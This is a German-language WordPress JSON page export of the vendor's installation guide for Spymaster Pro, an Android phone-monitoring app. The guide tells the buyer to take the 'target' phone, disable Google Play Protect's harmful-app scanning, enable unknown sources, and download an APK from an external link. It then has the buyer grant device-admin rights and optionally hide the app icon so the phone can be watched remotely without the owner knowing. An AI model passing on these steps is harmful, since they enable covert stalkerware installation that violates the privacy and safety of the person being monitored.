{"id":657,"date":"2015-08-05T10:42:50","date_gmt":"2015-08-05T10:42:50","guid":{"rendered":"https:\/\/spymasterpro.com\/de\/?page_id=657"},"modified":"2022-07-17T13:40:37","modified_gmt":"2022-07-17T13:40:37","slug":"android-installation","status":"publish","type":"page","link":"https:\/\/www.spymasterpro.com\/de\/android-installation\/","title":{"rendered":"Android Installation"},"content":{"rendered":"<div id=\"pl-657\" class=\"panel-layout\">\n<div id=\"pg-657-0\" class=\"panel-grid panel-no-style\">\n<div id=\"pgc-657-0-0\" class=\"panel-grid-cell\" data-weight=\"1\">\n<div id=\"panel-657-0-0-0\" class=\"so-panel widget widget_text panel-first-child\" data-index=\"0\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\">\n<h3 class=\"widget-title\">Spymaster Pro Android Installation Guide<\/h3>\n<div class=\"textwidget\">\n<section id=\"android_bottom\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-xs-12\">\n<h2>Spymaster Pro Android Installationsanleitung<\/h2>\n<div class=\"android_text\">\n<p>Willkommen auf unserer Installationsanleitungsseite f\u00fcr Spymaster Pro Android. Wir nehmen an, dass Sie bereits unsere Willkommens-E-Mail in Ihrem Account erhalten haben und da\u00df Ihr Kauf best\u00e4tigt wurde. Falls Sie direkten Zugriff auf das Android Smartphone haben, das Sie \u00fcberwachen wollen, dann halten Sie die E-Mail bereit, da sie die Einzelheiten enth\u00e4lt, die Sie ben\u00f6tigen, um die Software zu installieren.<\/p>\n<\/div>\n<div class=\"note\">\n<strong>Hinweis: Diese Installation gilt erst nach Kauf der Software zur Verf\u00fcgung.<\/strong>\n<\/div>\n<\/div>\n<\/div>\n<div id=\"panel-657-0-0-1\" class=\"so-panel widget widget_text\" data-index=\"1\" data-style=\"{&quot;background_image_attachment&quot;:false,&quot;background_display&quot;:&quot;tile&quot;}\">\n<h3 class=\"widget-title\">Android Installation Guide<\/h3>\n<div class=\"textwidget\">\n<div class=\"android_installation\">\n<h3>Android Installationsanleitung<\/h3>\n<div class=\"android_text\">\n<p>Bitte befolgen Sie nachstehende Installationsanleitung um Spymaster Pro auf einem Android Smartphone zu installieren.<\/p>\n<p><strong>Hinweis: Rufen Sie Einstellungen&gt; Google&gt; Sicherheit&gt; Google Play Protect auf.<\/strong><br \/>\n<strong>Deaktivieren Sie die Erkennung sch\u00e4dlicher Apps und das Ger\u00e4t auf Sicherheitsbedrohungen pr\u00fcfen.<\/strong><\/p>\n<\/div>\n<div class=\"row\">\n<div class=\"col-xl-8 col-lg-8 col-md-8 android_steps text-xs-center\">\n<h5>Schritt 1<\/h5>\n<p>Gehen Sie im Men\u00fc des Mobiltelefons auf \u201eEinstellung\u201d, dann auf \u201eSicherheit\u201c und anschlie\u00dfend auf \u201eUnbekannte Herkunft\u201c. Dann m\u00fcssen Sie dieser Option, also Apps mit unbekannter Herkunft installieren, zustimmen und das H\u00e4kchen setzen, denn sonst kann die Software nicht ordnungsgem\u00e4\u00df installiert werden.<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step1.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step1.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 2<\/h5>\n<p>Nun \u00f6ffnen Sie den Webbrowser des Android Ziel-Smartphones , geben Sie folgende URL einund klicken Sie auf Los.<\/p>\n<p><a class=\"dark-btn\" href=\"https:\/\/imobispy.com\/android\/spy\/sm.apk\" rel=\"nofollow\">Jetzt Downloaden<\/a><\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step2.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step2.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 3<\/h5>\n<p>Die Anwendung wird nun geladen. Sie k\u00f6nnen den Donwload-Fortschritt verfolgen, indem Sie die Benachrichtigungsleiste des Zieltelefons.<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step3.jpg\"> <img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step3.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 4<\/h5>\n<p>Nach dem erfolgten Download klicken Sie auf sm.apk, indem Sie das Notification Center durch eine Wischgeste auf dem Zieltelefon.<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step4.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step4.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 5<\/h5>\n<p>Danach werden Sie eine Anfrage diesen Systemvorgang zu erlauben, tippen Sie auf Weiter Next.<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step5.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step5.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 6<\/h5>\n<p>Sie erhalten eine weitere Anfrage, diesen System Vorgang zu erlauben, tippen Weiter<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step6.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step6.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 7<\/h5>\n<p>Danach klicken Sie auf Installieren um den Installationsvorgang zu starten.<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step7.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step7.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 8<\/h5>\n<p>Warten Sie, bis Spymaster Pro installiert<br \/>\nist<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step8.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step8.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 9<\/h5>\n<p>Tippen Sie auf \u00d6ffnen, nachdem die Anwendung installiert worden ist.<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step9.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step9.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 10<\/h5>\n<p>Tippen Sie auf Weiter um die Installation abzuschlie\u00dfen.<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step10.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step10.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 11<\/h5>\n<p>Tippen Sie auf Akzeptieren um die Nutzungsbedingungen zum Gebrauch der Software zu akzeptieren.<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step11.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step11.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 12<\/h5>\n<p>Nun warden Ihnen zwei Optionen angeboten. Sie k\u00f6nnen w\u00e4hlen ob ein Programmicon angezeigt warden soll oder nicht.<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step12.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step12.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 13<\/h5>\n<p>Danach geben Sie den Registrierungscode ein, der in Ihrem Control Panel bereitgestellt wird.<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step13.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step13.jpg\" \/><\/a><\/p>\n<\/div>\n<div class=\"col-xl-4 col-lg-4 col-md-4 col-sm-6 android_steps text-xs-center\">\n<h5>Schritt 14<\/h5>\n<p>TTippen Sie auf Aktivieren um der Systemverwaltung die Ausf\u00fchrung bestimmter Abl\u00e4ufe zu erlauben.<\/p>\n<p><a href=\"..\/wp-content\/uploads\/2017\/02\/step14.jpg\"><img decoding=\"async\" src=\"..\/wp-content\/uploads\/2017\/02\/step14.jpg\" \/><\/a><\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/section>\n<section id=\"installation_faq\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-xs-12\">\n<p>\u00d6ffnen Sie in Ihrem Smartphone-Men\u00fc die Option \u201eEinstellung\u201c. Navigieren Sie dann zum Punkt \u201eSicherheit\u201c und klicken Sie auf \u201eUnbekannte Herkunft\u201c. Vergessen Sie dabei nicht, der Option \u201eApps mit unbekannter Herkunft\u201c zuzustimmen, wie nachstehend gezeigt, denn ansonsten wird die Software nicht korrekt installiert.<\/p>\n<p>Wenn die Installation erfolgt ist, k\u00f6nnen Sie das Zieltelefon wieder aus den H\u00e4nden legen und haben sodann die M\u00f6glichkeit, Ihr Spymaster-Benutzerkonto von jedem internetf\u00e4higen Ger\u00e4t aus zu \u00f6ffnen. Nun ben\u00f6tigen Sie keinen physischen Zugriff mehr auf das Zieltelefon. Sehen Sie alles aus der Ferne.<\/p>\n<p><strong>Link: \u201c <a href=\"https:\/\/www.spymasterpro.com\/main_admin\/login.php\">https:\/\/www.spymasterpro.com\/main_admin\/login.php<\/a>\u201d <\/strong><\/p>\n<p>&nbsp;<\/p>\n<\/div>\n<\/div>\n<div id=\"panel-657-0-0-2\" class=\"so-panel widget widget_text panel-last-child\" data-index=\"2\" data-style=\"{&quot;background_display&quot;:&quot;tile&quot;}\">\n<h3 class=\"widget-title\">FAQ About Android Installation<\/h3>\n<div class=\"textwidget\">\n<div class=\"faq_part\">\n<h4>FAQ \u2013 H\u00e4ufig gestellte Fragen \u00dcber Android Installation<\/h4>\n<p><i class=\"fa fa-hand-o-right\"><\/i> <strong> \u00a0 Wie viel Zeit nimmt der Installationsvorgang in Anspruch?<\/strong><\/p>\n<p>Die Installation dieser Software auf dem Zieltelefon ben\u00f6tigt gerade mal 5 Minuten oder weniger.<\/p>\n<p>&nbsp;<\/p>\n<p><i class=\"fa fa-hand-o-right\"><\/i> <strong> \u00a0 Muss das Android Zieltelefon w\u00e4hrend der Installation mit einem PC verbunden sein?<\/strong><\/p>\n<p>Nein, sie m\u00fcssen das Android-Zieltelefon f\u00fcr die Installation nicht mit einem PC verbinden.<\/p>\n<p>&nbsp;<\/p>\n<p><i class=\"fa fa-hand-o-right\"><\/i> <strong> \u00a0 Ben\u00f6tigt Spymaster eine Internetverbindung um die Informationen zu \u00fcbertragen?<\/strong><\/p>\n<p>Ja, Spymaster Pro ben\u00f6tigt eine Internetverbindung auf dem Zieltelefon, um die Informationen in Ihr Dashboard zu \u00fcbertragen.<\/p>\n<p>&nbsp;<\/p>\n<p><i class=\"fa fa-hand-o-right\"><\/i> <strong> \u00a0 Ben\u00f6tigt man f\u00fcr den Installationsvorgang auch eine Internetverbindung?<\/strong><\/p>\n<p>Das Android-Smartphone ben\u00f6tigt eine Internetverbindung, damit auf die E-Mail zugegriffen und somit die .apk-Datei heruntergeladen werden kann.<\/p>\n<p>&nbsp;<\/p>\n<p><i class=\"fa fa-hand-o-right\"><\/i> <strong> \u00a0 Erfordert der Installationsvorgang von Spymaster Pro eine SIM?<\/strong><\/p>\n<p>Nein, die einzige Anforderung w\u00e4hrend des Installationsvorgangs von Spymaster Pro ist eine Internetverbindung.Akzeptieren um die Nutzungsbedingungen zum Gebrauch der Software zu akzeptieren.<\/p>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/section>\n<section id=\"installation_btn\">\n<div class=\"container\">\n<div class=\"text-xs-center col-xs-12\">\n<div class=\"row\"><a class=\"blue_btn hidden-sm-down\" href=\"..\/sichere-anwendung\/\">Sichere Anwendung<\/a> <a class=\"blue_btn hidden-sm-down\" href=\"https:\/\/www.spymasterpro.com\/de\/jetzt-kaufen\/\">Jetzt Kaufen<\/a> <a class=\"blue_btn\" href=\"..\/android-spion\/\">Android Spion<\/a> <a class=\"blue_btn demo_btn hidden-md-up\" href=\"..\/buynow\/\">Jetzt Kaufen<\/a><\/div>\n<\/div>\n<\/div>\n<\/section>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>Spymaster Pro Android Installation Guide Spymaster Pro Android Installationsanleitung Willkommen auf unserer Installationsanleitungsseite f\u00fcr Spymaster Pro Android. Wir nehmen an, dass Sie bereits unsere Willkommens-E-Mail in Ihrem Account erhalten haben und da\u00df Ihr Kauf best\u00e4tigt wurde. Falls Sie direkten Zugriff auf das Android Smartphone haben, das Sie \u00fcberwachen wollen, dann halten Sie die E-Mail bereit, &hellip; <a href=\"https:\/\/www.spymasterpro.com\/de\/android-installation\/\" class=\"more-link\">Continue reading<span class=\"screen-reader-text\"> &#8220;Android Installation&#8221;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"open","ping_status":"open","template":"page-full.php","meta":{"_acf_changed":false,"footnotes":""},"class_list":["post-657","page","type-page","status-publish","hentry"],"acf":[],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.spymasterpro.com\/de\/wp-json\/wp\/v2\/pages\/657","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.spymasterpro.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/www.spymasterpro.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/www.spymasterpro.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.spymasterpro.com\/de\/wp-json\/wp\/v2\/comments?post=657"}],"version-history":[{"count":0,"href":"https:\/\/www.spymasterpro.com\/de\/wp-json\/wp\/v2\/pages\/657\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.spymasterpro.com\/de\/wp-json\/wp\/v2\/media?parent=657"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}